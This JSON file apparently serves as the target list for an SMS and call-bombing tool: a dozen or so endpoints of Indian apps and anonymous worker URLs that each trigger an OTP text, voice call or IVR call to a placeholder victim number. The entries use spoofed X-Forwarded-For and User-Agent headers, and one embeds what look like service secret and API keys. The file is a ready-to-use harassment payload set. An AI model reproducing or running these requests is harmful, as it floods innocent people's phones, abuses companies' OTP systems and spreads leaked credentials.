[
    {
        "name": "Clovia - OTP on Call",
        "url": "https://www.clovia.com/api/v4/users/send-otp-on-call/",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "secretkey": "_fxv&8)36e@kb8na3nj@azl@hzdkfmpaf)lf0+!kt4tu!=feea",
            "apikey": "u(ihlye!wv)d6zpiyp@qxyqwlt)86#o%v^t%@ki-i@bm+18x7g",
            "User-Agent": "Mozilla/5.0 (Linux; Android 14; RMX3081 Build/RKQ1.211119.001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "phone": "{no}",
            "is_signup": "true",
            "email": "",
            "otp": ""
        }
    },
    {
        "name": "IndiaLends - Resend OTP",
        "url": "https://indialends.com/pl/SP_MVResend",
        "method": "POST",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (Linux; Android 14; RMX3081 Build/RKQ1.211119.001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": "MobileNumber={no}&Mode=2"
    },
    {
        "name": "PenPencil - Resend OTP",
        "url": "https://api.penpencil.co/v1/users/resend-otp?smsType=2",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "organizationId": "5eb393ee95fab7468a79d189",
            "mobile": "{no}"
        }
    },
    {
        "name": "Happi Mobiles - Login",
        "url": "https://dev-services.happimobiles.com/api/user-login/homepage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "phone": "{no}"
        }
    },
    {
        "name": "HeyoPhone - Voice OTP",
        "url": "https://api.heyophone.com/heyo/v1/otp/send",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "x-device-id": "a1b2c3d4e5f67890",
            "x-device-type": "android",
            "User-Agent": "okhttp/4.9.2",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "country_code": "+91",
            "number": "{no}",
            "via": "call"
        }
    },
    {
        "name": "Dreamplug - Resend OTP",
        "url": "https://app-prod.dreamplug.in/otp/v2/resend",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json; charset=UTF-8",
            "x-request-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-transaction-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-session-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-installation-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-device-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-application-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-os": "android",
            "x-os-version": "14",
            "x-os-api-level": "34",
            "x-app-version": "4.8.5.4",
            "x-app-version-code": "40805004",
            "user-agent": "okhttp/4.9.2",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "channel": "voice",
            "phone": "+91{no}"
        }
    },
    {
        "name": "Magicpin - Send OTP V2",
        "url": "https://auth.magicpin.in/SendOtp/V2/",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json; charset=UTF-8",
            "User-Agent": "okhttp/4.9.2",
            "package-name": "com.magicpin.local",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "phone_no": "91{no}",
            "sms_service_flag": "0",
            "app-version-name": "1.150.0",
            "app-version": "1500"
        }
    },
    {
        "name": "Magicpin - Send OTP Call",
        "url": "https://auth.magicpin.in/SendOtpByCall/",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json; charset=UTF-8",
            "User-Agent": "okhttp/4.9.2",
            "package-name": "com.magicpin.local",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "phone_no": "91{no}",
            "app-version-name": "1.150.0",
            "app-version": "1500"
        }
    },
    {
        "name": "Nikita Worker - OTP Relay",
        "url": "https://test-api.nikita973280.workers.dev",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0 (Linux; Android 14; RMX3081 Build/RKQ1.211119.001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "endpoint": "comm",
            "phoneNumber": "{no}",
            "countryCode": "IN",
            "phoneCode": "91"
        }
    },
    {
        "name": "FreeNow - Voice Call",
        "url": "https://api.live.free-now.com/signupwithphoneservice/v3/passenger/challenge",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user-agent": "mytaxi_passenger/13.50.0_2850 ANDROID/14 (RMX3081)",
            "incognia-installation-id": "MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5",
            "session-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "x-myt-request-id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "deviceId": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
            "phoneAreaCode": "+91",
            "phoneNumber": "{no}",
            "type": "VOICE_CALL"
        }
    },
    {
        "name": "Chaayos - IVR Call",
        "url": "https://dine.chaayos.com/app-crm/v2/crm/v/r2-ivr/1000",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "X-Forwarded-For": "192.168.1.1"
        },
        "body": {
            "mobileNumber": "{no}"
        }
    },
    {
        "name": "Callun Worker",
        "url": "https://callun-janmeri.hb3284008.workers.dev/?phone={no}",
        "method": "GET",
        "headers": {},
        "body": null
    },
    {
        "name": "King Worker 1",
        "url": "https://king2.blackdevil3210123-f5a.workers.dev/?mobile={no}",
        "method": "GET",
        "headers": {},
        "body": null
    }
]